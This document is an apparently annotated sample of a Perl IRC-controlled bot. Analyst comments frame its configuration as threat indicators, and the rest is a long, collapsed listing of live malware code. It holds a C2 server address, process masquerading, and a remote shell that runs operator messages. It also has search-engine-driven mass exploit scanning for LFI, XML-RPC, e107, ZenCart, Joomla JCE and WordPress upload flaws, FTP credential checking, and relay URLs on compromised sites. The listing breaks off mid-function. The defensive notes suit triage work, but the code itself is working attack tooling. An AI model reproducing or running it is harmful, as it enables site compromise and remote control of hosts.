#!/usr/bin/perl
# ANALYST NOTE: configuration section of an IRC-controlled Perl bot.
# Everything below is set at start-up; the values are reproduced unchanged
# and annotated for use as indicators when triaging a host or web logs.
# The original listing was collapsed onto a few long lines; it is shown here
# one statement per line.

# Modules loaded: HTTP client (LWP / HTTP::Request), raw sockets and
# IO::Select for the IRC connection, plus Base64 / URI escaping / MD5 helpers.
use HTTP::Request;
use HTTP::Request::Common;
use HTTP::Request::Common qw(POST);
use LWP::Simple;
use LWP 5.64;
use LWP::UserAgent;
use Socket;
use IO::Socket;
use IO::Socket::INET;
use IO::Select;
use MIME::Base64;
use URI::Escape;
use Digest::MD5 qw(md5_hex);

# Start time string; returned to CTCP TIME requests later in the file.
my $datetime = localtime;
# Random 0-99 value reused in the default nick and in several command triggers.
my $number = int(rand(100));

# Process-name masquerade: later in the file $0 is overwritten with this
# string, so `ps` shows "/usr/sbin/httpd" for what is actually a perl
# process. Detection: compare the displayed name with /proc/<pid>/exe.
my $fakeproc = "/usr/sbin/httpd";

# Default IRC endpoint, nick, ident and channels. Later in the file
# $ARGV[0..3] override server, port, nick and channel, so these defaults
# alone are not a reliable indicator.
# NOTE(review): 66661 is above 65535, the highest valid TCP port.
my $ircserver = "5.135.208.233";
my $ircport = "66661";
# Default nick has the form ALB[<0-99>].
my $nickname = "ALB[".$number."]";
my $ident = "Alb";
my $channel = "#kampung";
my $chanxxx = "#kampung";
# Nick that receives the "im here" PRIVMSG after connecting. The isAdmin()
# check used by the command handlers is defined outside this part of the
# file - presumably it compares against this value; confirm.
my $admin = "pico";
my $fullname = "8,1[4!9]4[Alboz]";
# Fifth and sixth command-line arguments; used by the !raw / !say / !act
# handlers later in the file.
my $rawmsg = $ARGV[4];
my $msgraw = $ARGV[5];

# Message prefixes used when reporting to IRC. The bare digits look like
# the remains of IRC colour codes whose control bytes were lost in
# extraction - confirm against the raw sample before building signatures.
my $nob0dy = "9,1[0*1]0[Alb-X-Team]";
my $lfilogo = "9,1[0*9]0Lfi 0<9-0> ";
my $xmllogo = "9,1[0*9]0Xml 0<9-0> ";
my $e107logo = "9,1[0*9]0E107 0<9-0> ";
my $zenlogo = "9,1[0*9]0ZenCart 0<9-0> ";
my $jcelogo = "9,1[0*9]0JcE 0<9-0> ";
my $rcilogo = "9,1[0*9]0RcI 0<9-0> ";
my $ffmlogo = "9,1[0*9]0FFM 0<9-0> ";
my $cgmlogo = "9,1[0*9]0CGM 0<9-0> ";
my $carilogo = "9,1[0*9]0Find 0<900> ";

# Channel command triggers matched by the message loop later in the file.
# Triggers built with $number carry the same random suffix as the default
# nick, so they differ from one running instance to the next.
my $lficmd = "!lfi";
my $xmlcmd = "!xml";
my $e107cmd = "!e107";
my $zencmd = "!zen";
my $jcecmd = "!jce".$number."";
my $rcicmd = "!rci".$number."";
my $ffmcmd = "!ffm".$number."";
my $cgmcmd = "!cgm".$number."";
my $cmdlfi = "!cmdlfi".$number."";
my $cmdxml = "!cmdxml".$number."";
my $ftpcmd = "!ftp";

# Remote text file on a dynamic-DNS host. Not referenced in the part of the
# file visible here; treat the URL as a network indicator.
my $botxx = "http://bitcoinshell.mooo.com/users/pico/oyop.txt";
# Timeout value; the !timot handler later in the file changes it and
# reports it as the "Get Content TimeOut".
my $timot = 10;
# Toggled by the !silent handler later in the file.
my $silentmode = 1;
# Fixed browser User-Agent string (Firefox 3.6 on Windows XP). Presumably
# sent on the bot's outbound HTTP requests - the request helpers are outside
# this part of the file. A server process emitting this dated desktop UA is
# a useful egress hunting signal.
my $uagent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6";
# Directory-traversal suffix ending in proc/self/environ; the $cmdlfi
# handler later in the file appends it to an operator-supplied URL.
# Web-log detection: long runs of "../" followed by proc/self/environ.
my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000";

# Query-string prefix carrying a double-URL-encoded Google search URL.
my $jpath = "?____pgfa=http%253A%252F%252Fwww.google.com%252Fsearch?q=";
# Third-party hosts, each with an "eror.php" script (mostly under
# images/stories/) combined with the prefix above. These look like relay
# scripts planted on already-compromised sites and used to proxy search
# queries - inferred from the URL shape, confirm. For site owners: a .php
# file inside a Joomla images/ directory is itself a compromise indicator.
my $jackae = "http://www.sparenergikramfors.se/images/stories/eror.php".$jpath;
my $jackar = "http://glatz-ev.it-syndicate.de/images/stories/eror.php".$jpath;
my $jackat = "http://www.parroquiajesusobrerotemuco.com/joomla/images/stories/eror.php".$jpath;
my $jackau = "http://www.duemmeambrassi.com/images/banners/eror.php".$jpath;
my $jackbr = "http://liga-t.com.ua/images/stories/eror.php".$jpath;
my $jackca = "http://www.grsl.com/images/stories/eror.php".$jpath;
my $jackcl = "http://lms-lorenskog.no/portal/images/stories/eror.php".$jpath;
my $jackcn = "http://www.wickandkeissbc.com/images/stories/eror.php".$jpath;
my $jackcom = "http://www.fourwindsnhc.com/cleansingdepot/images/stories/eror.php".$jpath;
my $jackcz = "http://www.intergraphics.gr/images/stories/eror.php".$jpath;
my $jackde = "http://noc.prodeb.ba.gov.br/images/stories/eror.php".$jpath;
my $jackdk = "http://www.curcubeuldeplopis.ro/images/stories/eror.php".$jpath;
my $jackes = "http://www.les-mosbach.info/start/images/stories/eror.php".$jpath;
my $jackeu = "http://www.gistutor.com/images/stories/eror.php".$jpath;
my $jackfr = "http://www.yellowcom.eu/images/stories/eror.php".$jpath;
my $jackhu = "http://www.ogrod.tartakmlynowo.pl/images/stories/eror.php".$jpath;
my $jackid = "http://www.gytcontinental.com.sv/website/images/stories/eror.php".$jpath;
my $jackil = "http://mommy.vn/images/stories/eror.php".$jpath;
my $jackin = "http://www.leprevost-art.fr/images/stories/eror.php".$jpath;
my $jackinfo = "http://122.154.129.219/sata/images/stories/eror.php".$jpath;
my $jackir = "http://www.leboeufsurlaplace.net//images/stories/eror.php".$jpath;
my $jackit = "http://www.kainton.com/kdsite/images/stories/eror.php".$jpath;
my $jackjp = "http://www.sieradenvoormannen.nl/images/stories/eror.php".$jpath;
my $jackkr = "http://www.eriusws.com/stagema/jupgrade//administrator/components/com_jinc/classes/graphics/tmp-upload-images/eror.php".$jpath;
my $jackmx = "http://www.giraldezpublicidad.com/images/stories/eror.php".$jpath;
my $jackmy = "http://rezekiseafood.com/images/stories/eror.php".$jpath;
my $jacknet = "http://www.solucioneslaser.com/images/stories/eror.php".$jpath;
my $jacknl = "http://61.93.252.78/home/images/stories/eror.php".$jpath;
my $jackorg = "http://www.vilellarahn.com/images/stories/eror.php".$jpath;
my $jackph = "http://schelmenkeller.servebeer.com/images/stories/eror.php".$jpath;
my $jackpl = "http://pcprmilicz.pl/cms/images/stories/eror.php".$jpath;
my $jackro = "http://www.sungoldpicture.com/images/stories/eror.php".$jpath;
my $jackru = "http://www.beholders.de/b1/images/stories/eror.php".$jpath;
my $jackth = "http://www.infoiarna.org.gt/promudel/images/stories/eror.php".$jpath;
my $jackua = "http://www.dibnc.com/images/stories/eror.php".$jpath;
my $jackuk = "http://www.vornay.fr/vornay/images/stories/eror.php".$jpath;
my $jackus = "http://www.089provisionsfrei.de/images/stories/eror.php".$jpath;
my $jacksi = "http://sklep.aptekafrancuska.com.pl/images/stories/eror.php".$jpath;
my $jackbe = "http://www.malwasan.de/images/stories/eror.php".$jpath;
my $jackbiz = "http://www.ogrod.tartakmlynowo.pl/images/stories/eror.php".$jpath;
my $jackby = "http://www.osgdoorsasia.com/images/stories/eror.php".$jpath;
my $jackma = "http://frankwurzinger.com/images/stories/eror.php".$jpath;
my $jackws = "http://www.purasalsacadiz.com/images/stories/eror.php".$jpath;
my $jackba = "http://karadenizinsaat.com.tr/images/stories/eror.php".$jpath;
my $jackal = "http://www.centi.pt/newlight/images/stories/eror.php".$jpath;
my $jackdo = "http://tim.com.pt/images/stories/eror.php".$jpath;
my $jackch = "http://gistutor.com/images/stories/eror.php".$jpath;
my $jacklu = "http://www.kcti1450.com/images/stories/eror.php".$jpath;
my $jackr1 = "http://www.elektro-uebelacker.de/images/stories/eror.php".$jpath;
my $jackr2 = "http://www.gainglobal.org/images/stories/eror.php".$jpath;
my $jackr3 = "http://122.154.140.99/sesao33/webplan/images/stories/eror.php".$jpath;
my $jackr4 = "http://www.megahmee.com/images/stories/eror.php".$jpath;
my $jackr5 = "http://www.remer.org.br/site/images/stories/eror.php".$jpath;
my $jackr6 = "http://www.keratsini-drapetsona.gr/images/stories/eror.php".$jpath;
my $jackr7 = "http://www.dalee.cz/images/stories/eror.php".$jpath;
my $jackr8 = "http://www.parkingpyrzowice-partner.netafilio.pl/images/stories/eror.php".$jpath;
my $jackr9 = "http://www.fullthrottlejunkies.org/ftj/images/stories/eror.php".$jpath;
my $jackr10 = "http://selsanyapi.com/images/stories/eror.php".$jpath;

# Comma-separated engine labels. se_start() later in the file tests this
# string with case-insensitive regexes, one check per label, and forks a
# worker for each match.
my $engine = "JacKAE,JacKAR,JacKAT,JacKAU,JacKBR,JacKCA,JacKCL,JacKCN,JacKCOM,JackCZ,JacKDE,JacKDK,JacKES,JacKEU,JacKFR,JacKHU,JacKID,JacKIL,JacKIN,JacKInfO,JacKIR,JacKIT,JacKJP,JacKKR,JacKMX,JacKMY,JacKNET,JacKNL,JacKORG,JacKPH,JacKPL,JacKRO,JacKRU,JacKTH,JacKUA,JacKUK,JacKUS,JacKSI,JacKBE,JacKBIZ,JacKCH,JacKLU,JacKBA,JacKDO,JacKBY,JacKMA,JacKAL,JacKWS,JacKR1,JacKR2,JacKR3,JacKR4,JacKR5,JacKR6,JacKR7,JacKR8,JacKR9,JacKR10,GooGLeCA,GooGLeDE,GooGLeUK,GooGLeFR,GooGLeES,GooGLeIT,GooGLeNL,GooGLeBE,GooGLeCH,GooGLeSE,GooGLeDK,GooGLeNO,GooGLeNZ,GooGLeIE,GooGLeBR,GooGLeAR,GooGLeCO,GooGLeCU,GooGLeCL,GooGLeMX,GooGLeAU,GooGLeRU,GooGLeAT,GooGLePL,GooGLeIL,GooGLeTR,GooGLeUA,GooGLeGR,GooGLeJP,GooGLeCN,GooGLeMY,GooGLeTH,GooGLeIN,GooGLeKR,GooGLeRO,GooGLeTW,GooGLeZA,GooGLePT,GooGLeBY,GooGLeSEY,YahOoCA,YahOoUK,YahOoDE,YahOoFR,YahOoES,YahOoIT,YahOoHK,YahOoID,YahOoIN,YahOoAU,YahOoMX,YahOoTW,YahOoBR,YahOoAR,YahOoNL,YahOoDK,YahOoPH,YahOoCL,YahOoRU,YahOoCH,YahOoCO,YahOoFI,YahOoRO,YahOoVE,YahOoAT,YahOoPL,YahOoKR,YahOoNZ,YahOoGR,YahOoPE,BingDE,BingUK,BingCA,BingBR,BingFR,BingES,BingIT,BingBE,BingNL,BingPT,BingNO,BingDK,BingSE,BingCH,BingNZ,BingRU,BingJP,BingCN,BingKR,BingMX,BingAR,BingCL,BingAU,AsKCA,AsKDE,AsKIT,AsKFR,AsKES,AsKRU,AsKNL,AsKUK,AsKBR,AsKPL,AsKAU,AsKAT,AsKJP,AsKSE,AsKMX,AsKNO,AsKDK";

# Joomla administrator component directories; several names point at a
# bundled Open Flash Chart library. Their use is outside the part of the
# file visible here. For Joomla administrators: check whether these
# directories exist on the site and review them for unexpected files.
my @jpaths = ('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart',
    '/administrator/components/com_acymailing/inc/openflash',
    '/administrator/components/com_jnewsletter/includes/openflashchart',
    '/administrator/components/com_jinc/classes/graphics',
    '/administrator/components/com_maianmedia/utilities/charts',
    '/administrator/components/com_jnews/includes/openflashchart');
# The next declaration continues on the following line of the file.
my
$jvuln = "/php-ofc-library/ofc_upload_image.php"; my $jshell = "/tmp-upload-images/lobex21.php"; $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; #chdir("/"); $ircserver = "$ARGV[0]" if $ARGV[0]; $ircport = "$ARGV[1]" if $ARGV[1]; $nickname = "$ARGV[2]" if $ARGV[2]; $channel = '#'."$ARGV[3]" if $ARGV[3]; $0 = "$fakeproc"."\0" x 16; my $pid = fork; exit if $pid; die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid); our %irc_servers; our %DCC; my $dcc_sel = new IO::Select->new(); $sel_client = IO::Select->new(); sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; } } sub connector { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); sendraw("USER $ident ".$IRC_socket->sockhost." 
$ircserver_con :$fullname"); sleep(1);}} sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick = $4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { nick($mynick.int(rand(5))); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("MODE $mynick +Bx"); sendraw("NS id qwe123"); sleep(3); sendraw("JOIN $channel correct"); sendraw("JOIN $chanxxx mejen"); sleep(1); sendraw("PRIVMSG $channel :8,1[4!9]4 + Jce , Rci Scanner - Chegou =D !!!"); sendraw("PRIVMSG $admin :Hi $admin im here !!!"); } } my $line_temp; while( 1 ) { while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); } select(undef, undef, undef, 0.01); delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $ircmsg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $ircmsg); $ircmsg =~ s/\r\n$//; if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) 
\:(.+)/) { my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5); if ($path eq $mynick) { if ($msg =~ /^PING (.*)/) { sendraw("NOTICE $nick :PING $1"); } if ($msg =~ /^VERSION/) { sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey"); } if ($msg =~ /^TIME/) { sendraw("NOTICE $nick :TIME ".$datetime.""); } if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) { sendraw("NICK ".$1); } if (&isAdmin($nick) && $msg =~ /^!pid/) { sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$"); } if (&isAdmin($nick) && $msg !~ /^!/) { &shell("$nick","$msg"); } if (&isAdmin($nick) && $msg =~ /^!raw (.+)/) { sendraw("$rawmsg $msgraw ".$1); } if (&isAdmin($nick) && $msg =~ /^!say (.+)/) { sendraw("PRIVMSG $rawmsg ".$1); } if (&isAdmin($nick) && $msg =~ /^!act (.+)/) { sendraw("PRIVMSG $rawmsg :ACTION ".$1.""); } if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) -d/) { $newtimot = $1; $timot = $newtimot; &msg("$admin","8,1 Get Content TimeOut change to4 $timot "); } if (&isAdmin($nick) && $msg =~ /^!chxchan\s+(.+) -d/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { $newchan = $1; $chanxxx = $newchan; &msg("$admin","8,1 xChan change to4 $chanxxx "); }}} } else { if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg eq "!part") { sendraw("PART $path"); } if (&isAdmin($nick) && $msg =~ 
/^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) { &shell("$path","$1"); } if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) { &shell("$path","$1"); } if (&isAdmin($nick) && $msg =~ /^!silent\s+(.*) -d/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { $smod = $1; if ($smod =~ /ON/) { $silentmode = 1; $silentstat = "ON"; } elsif ($smod =~ /OFF/) { $silentmode = 0; $silentstat = "OFF"; } &msg("$path","8,1[4!9]Silent Mode4 $silentstat !!!!"); }}} if ($msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){ my $url = $1.$lfdtest; my $cmd = $2; &cmdlfi($url,$cmd,$path); } if ($msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){ my $url = $1; my $cmd = $2; &cmdxml($url,$cmd,$path); } if ($msg=~ /^$cmde107\s+(.*?)\s+(.*)/){ my $url = $1; my $cmd = $2; &cmde107($url,$cmd,$path); } ##################################################################### HELP COMMAND if ($msg=~ /^!help/) { my $helplogo = "8,1[4!9]4Help 4<9=4> "; &msg("$path","$helplogo9LFI Vuln Scan:4 $lficmd [bug] [dork] "); &msg("$path","$helplogo9XML Vuln Scan:4 $xmlcmd [bug] [dork] "); &msg("$path","$helplogo9e107 Vuln Scan:4 $e107cmd [dork] "); &msg("$path","$helplogo9ZenCart Vuln Scan:4 $zencmd [dork] "); &msg("$path","$helplogo9Joomla CE Vuln Scan:4 $jcecmd [dork] "); &msg("$path","$helplogo9Joomla Exploit:4 $rcicmd [dork] "); } if (&isAdmin($nick) && $msg =~ /^!pid/) { &msg("$nick","6Fake Process/PID : $fakeproc - $$"); } ##################################################################### SCAN if ($msg =~ /!cari\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $find = $1; &msg($path,"$carilogo9 Searching 4$find "); &cari($path,$find); } exit; } } if ($msg =~ /^$lficmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); &msg("$chanxxx","8,1[4!9]4Lapor 4<9=4> 9$nick 4lagi scan LFI di 4$path "); &msg("$path","$lfilogo9Dork 4<9=4>4 $dork "); &msg("$path","$lfilogo9Bugz 
4<9=4>4 $bug "); &msg("$path","$lfilogo9Search Engine 4<9=4>4 Loading "); &se_start($path,$bug,$nick,$dork,$engine,1); } } } if ($msg =~ /^$xmlcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); &msg("$chanxxx","8,1[4!9]4Lapor 4<9=4> 9$nick 4lagi scan XML di 4$path "); &msg("$path","$xmllogo9Dork 4<9=4>4 $dork "); &msg("$path","$xmllogo9Bugz 4<9=4>4 $bug "); &msg("$path","$xmllogo9Search Engine 4<9=4>4 Loading "); &se_start($path,$bug,$nick,$dork,$engine,2); } } } if ($msg =~ /^$e107cmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if (&isFound($thumbid,"GIF89")) { my ($bug,$dork) = ("contact.php",$1); &msg("$chanxxx","8,1[4!9]4Lapor 4<9=4> 9$nick 4lagi scan E107 di 4$path "); &msg("$path","$e107logo9Dork 4<9=4>4 $dork "); &msg("$path","$e107logo9Search Engine 4<9=4>4 Loading "); &se_start($path,$bug,$nick,$dork,$engine,3); } else { &msg("$path","8,1[4!9]Injector 4<9=4>4 Lost!!! 
"); } } } } if ($msg =~ /^$zencmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1); &msg("$chanxxx","8,1[4!9]4Lapor 4<9=4> 9$nick 4lagi scan ZenCart di 4$path "); &msg("$path","$zenlogo9Dork 4<9=4>4 $dork "); &msg("$path","$zenlogo9Search Engine 4<9=4>4 Loading "); &se_start($path,$bug,$nick,$dork,$engine,4); } } } if ($msg =~ /^$jcecmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","$jcelogo9,1Denied $nick, 0Dork Already Scanned "); exit; } else { &msg("$chanxxx","9,1[0*9]9Lapor 0<9*0> 9$nick 0Start scan JcE di 4$path "); &sendraw("mode $path +m"); &msg("$path","$jcelogo9Dork 4<9=4>4 $dork "); &msg("$path","$jcelogo9Search Engine 0<9*0>9 Loading "); &write_dorks($dork); &se_start($path,$bug,$nick,$dork,$engine,5); } } } } if ($msg =~ /^$ffmcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("wp-content/plugins/front-file-manager/upload.php",$1); &msg("$chanxxx","8,1[4!9]4Lapor 4<9=4> 9$nick 4lagi scan FFM di 4$path "); &msg("$path","$ffmlogo9Dork 4<9=4>4 $dork "); &msg("$path","$ffmlogo9Search Engine 4<9=4>4 Loading "); &se_start($path,$bug,$nick,$dork,$engine,6); } } } if ($msg =~ /^$rcicmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","$rcilogo9Denied $nick, 4Dork Already Scanned "); exit; } else { &msg("$chanxxx","8,1[4!9]4Lapor 4<9=4> 9$nick 4lagi scan RcI di 4$path "); &sendraw("mode $path +m"); &msg("$path","$rcilogo9Dork 4<9=4>4 $dork "); &msg("$path","$rcilogo9Search Engine 4<9=4>4 Loading "); 
&se_start($path,$bug,$nick,$dork,$engine,7); &write_dorks($dork); } } } } if ($msg =~ /^$cgmcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("wp-content/plugins/complete-gallery-manager/frames/upload-images.php",$1); &msg("$chanxxx","8,1[4!9]4Lapor 4<9=4> 9$nick 4lagi scan CGM di 4$path "); &msg("$path","$cgmlogo9Dork 4<9=4>4 $dork "); &msg("$path","$cgmlogo9Search Engine 4<9=4>4 Loading "); &se_start($path,$bug,$nick,$dork,$engine,8); } } } if ($msg =~ /^$ftpcmd\s+(.+?)\s+(.*)\s+(.*)/) { my $url = $_[0]; my $host = $_[1]; my $user = $_[2]; my $pass = $_[3]; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($host,$user,$pass) = ($1,$2,$3); &msg("$path","8,1[4!9]FTP 4<9=4>4 Checking $host | $user:$pass"); my $success = 1; use Net::FTP; my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($user,$pass); $ftp->quit; if ($success == 0) { ¬ice("$nick","4,1 [9FTP4] [ 9http://".$host." 4] [".$user.":".$pass."4] 9Success "); } else { ¬ice("$nick","4,1 [9FTP4] [ 9http://".$host." 
4] [".$user.":".$pass."4] 4Denied "); } } } } } } for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line = $line_temp.$line if ($line_temp); $line_temp = ''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } } } ################################################################################## sub lobex() { my $dork = $_[0]; my @targets; for (my $st=0; $st<=1000 ; $st+=100){ my $engine = "http://www.google.com/search?q=".uri_escape($dork)."&num=100&start=".$st; my $browser = &search_engine_query($engine); while ($browser =~ m/ 0) { foreach my $site(@target) { $count++; if ($count == $num-1) { &msg("$chan","$carilogo9Finished 4for 9$dork "); } my $test = "http://".$site.".php?src=".$thumbshell; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $coba = &get_content($test); if ($coba =~ /Unable to open image/) { &msg($chan,"$carilogo9 VulN 4-> 4 http://".$site.".php "); } } exit; } } } } sub type() { my ($chan,$bug,$nick,$dork,$engine,$type) = @_; if ($type == 1){$type=&lfi_exploit($chan,$bug,$nick,$dork,$engine);} elsif ($type == 2){$type=&xml_exploit($chan,$bug,$nick,$dork,$engine);} elsif ($type == 3){$type=&e107_exploit($chan,$bug,$nick,$dork,$engine);} elsif ($type == 4){$type=&zen_exploit($chan,$bug,$nick,$dork,$engine);} elsif ($type == 5){$type=&jce_exploit($chan,$bug,$nick,$dork,$engine);} elsif ($type == 6){$type=&ffm_exploit($chan,$bug,$nick,$dork,$engine);} elsif ($type == 7){$type=&rci_exploit($chan,$bug,$nick,$dork,$engine);} elsif ($type == 8){$type=&cgm_exploit($chan,$bug,$nick,$dork,$engine);} } ################################################################################## sub se_start() { my ($chan,$bug,$nick,$dork,$engine,$type) = @_; if ($engine =~ /jackae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { 
if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKAE",$type); } exit; } } if ($engine =~ /jackar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKAR",$type); } exit; } } if ($engine =~ /jackat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKAT",$type); } exit; } } if ($engine =~ /jackau/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKAU",$type); } exit; } } if ($engine =~ /jackbr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKBR",$type); } exit; } } if ($engine =~ /jackca/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKCA",$type); } exit; } } if ($engine =~ /jackcl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKCL",$type); } exit; } } if ($engine =~ /jackcn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKCN",$type); } exit; } } if ($engine =~ /jackcom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKCoM",$type); } exit; } } if ($engine =~ /jackcz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKCZ",$type); } exit; } } if ($engine =~ /jackde/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKDE",$type); } exit; } } if ($engine =~ /jackdk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKDK",$type); } exit; } } if ($engine =~ /jackes/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { 
&type($chan,$bug,$nick,$dork,"JacKES",$type); } exit; } } if ($engine =~ /jackeu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKEU",$type); } exit; } } if ($engine =~ /jackfr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKFR",$type); } exit; } } if ($engine =~ /jackhu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKHU",$type); } exit; } } if ($engine =~ /jackid/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKID",$type); } exit; } } if ($engine =~ /jackil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKIL",$type); } exit; } } if ($engine =~ /jackin/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKIN",$type); } exit; } } if ($engine =~ /jackinfo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKInfO",$type); } exit; } } if ($engine =~ /jackir/i) { if (my $pid = fork) { 